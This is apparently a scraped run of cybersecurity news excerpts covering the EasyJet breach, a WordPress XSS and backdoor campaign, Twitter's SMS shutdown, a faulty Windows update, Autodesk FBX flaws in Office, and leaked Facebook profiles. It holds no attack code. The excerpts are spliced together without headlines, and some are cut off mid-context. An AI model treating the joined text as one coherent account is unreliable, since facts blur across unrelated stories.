EasyJet, the UK’s largest airline, has disclosed that they were hacked and that the email addresses and travel information for 9 million customers were exposed. For some of these customers, credit card details were also accessed by the attackers.
In a data breach notification disclosed today, EasyJet states that they have suffered a cyberattack, and an unauthorized third-party was able to gain access to their systems.
During this attack, the threat actors were able to access the email addresses and travel information for nine million customers. For approximately 2,208 customers, credit card details were also exposed.
Hackers have launched a massive attack against more than 900,000 WordPress sites seeking to redirect visitors to malvertising sites or plant a backdoor if an administrator is logged in.
Based on the payload, the attacks seem to be the work of a single threat actor, who used at least 24,000 IP addresses over the past month to send malicious requests to more than 900,000 sites.
XSS, malvertising, backdoor
Compromise attempts increased after April 28. WordPress security company Defiant, makers of Wordfence security plugin, detected on May 3 over 20 million attacks against more than half a million websites.
Ram Gall, senior QA at Defiant, said that the attackers focused mostly on exploiting cross-site scripting (XSS) vulnerabilities in plugins that received a fix months or years ago and had been targeted in other attacks.
The backdoor then gets another payload and stores it in the theme’s header in an attempt to execute it. “This method would allow the attacker to maintain control of the site” Gall explains.
This way, the attacker could switch to a different payload that could be a webshell, code that creates a malicious admin or for deleting the content of the entire site. In the report today, Defiant included indicators of compromise for the final payload.
witter announced today that it has turned off the Twitter via SMS service because of security concerns, a service which allowed the social network’s users to tweet using text messages since its early beginnings.
“We want to continue to help keep your account safe,” the company’s support account tweeted earlier today.
“We’ve seen vulnerabilities with SMS, so we’ve turned off our Twitter via SMS service, except for a few countries.”
However, as the company added, Twitter users will still be able to use “important SMS messages” to log in onto the platform and to manage their accounts.
Microsoft is investigating Bluetooth issues, failures to install, and blue screen reports received from users who have installed or attempted to install the KB4549951 cumulative update released during this month’s Patch Tuesday.
KB4549951 provides customers with security fixes for devices running Windows 10, version 1909, and Windows 10, version 1903, and it can be installed automatically by checking for updates via Windows Update or manually from the Microsoft Update Catalog.
Windows admins can also distribute the update to users via Windows Server Update Services (WSUS). Customers who have automatic updates enabled don’t need to take any further actions.
As we have reported last week, users are reporting a wide assortment of issues when installing and after deploying KB4549951, ranging from blue screens of death (BSODs), failures to install, networking issues, display issues, and system freezes when trying to use streaming services.
Others are saying that their Windows 10 installation is completely broken with their devices being unable to boot again after installing the KB4549951 update.
Microsoft has released an out-of-band security update that fixes remote code execution vulnerabilities in an Autodesk FBX library integrated into Microsoft Office and Paint 3D applications.
Last month, Autodesk issued security updates for their Autodesk FBX Software Development Kit that resolves remote code execution and denial of service vulnerabilities caused by specially crafted FBX files.
An FBX file is an Autodesk file format that is used to store 3D models, assets, shapes, and animations.
To exploit these vulnerabilities, an attacker would create a malicious FBX file that would exploit “buffer overflow, type confusion, use-after-free, integer overflow, NULL pointer dereference, and heap overflow vulnerabilities” to perform a DoS attack or remotely execute code.
Microsoft Office uses the Autodesk FBX library
As the Microsoft Office 2016, Microsoft 2019, Office 365, and Paint 3D applications utilize the Autodesk FBX library, Microsoft has released today new security updates that resolve these remote code execution and DoS vulnerabilities in their products.
In an advisory titled “ADV200004 | Availability of updates for Microsoft software utilizing the Autodesk FBX library”, Microsoft explains that opening malicious FBX files in Office applications could lead to remote code execution.
Threat actors are selling over 267 million Facebook profiles for £500 ($623) on dark web sites and hacker forums. While none of these records include passwords, they do contain information that could allow attackers to perform spear phishing or SMS attacks to steal credentials.
Last month, security researcher Bob Diachenko discovered an open Elasticsearch database that contained a little over 267 million Facebook records, with most being users from the United States.
For many of these records, they contained a user’s full name, their phone number, and a unique Facebook ID.
The ISP hosting the database eventually took the server offline after being contacted by Diachenko.
Soon after, a second server containing the same data plus an addition 42 million records was brought online but was quickly attacked by unknown threat actors who left a message telling the owners to secure their servers.
Of this new data, 16.8 million records included more information such as a Facebook user’s email address, birth date, and gender.
It was not discovered who these servers belonged to, but Diachenko believed that it was owned by a criminal organization who stole the data using the Facebook API before it was locked down or via scraping public profiles.